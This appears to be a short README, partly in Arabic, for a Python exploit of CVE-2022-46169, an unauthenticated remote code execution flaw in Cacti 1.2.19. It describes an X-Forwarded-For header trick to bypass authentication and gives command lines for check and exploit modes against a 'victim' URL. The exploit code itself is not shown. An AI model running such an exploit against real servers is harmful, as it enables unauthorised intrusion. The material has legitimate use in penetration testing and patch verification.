
استغلال بايثون لـ CVE-2022-46169 يستهدف Cacti 1.2.19 مع تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليه. يدعم وضع الفحص لفحص الثغرات ووضع الاستغلال مع تجاوز X-Forwarded-For.
استغلال لثغرة CVE-2022-46169 على Cacti 1.2.19
[الخيارات]
-u --url victim's url
-f --forwarded X-Forwarded value to bypass the auth
-m --mode: check for Checking for Vulnerable Servers, or exploit for Fun exploitation mode :D
[الاستخدام]
1. $> ./cve_2022_46169.py -u http://10.10.10.10/cacti -f 10.10.10.10 -m exploit
2. $> ./cve_2022_46169.py -u http://10.10.10.10/cacti -f 127.0.0.1 -m check
[المراجع]
https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/
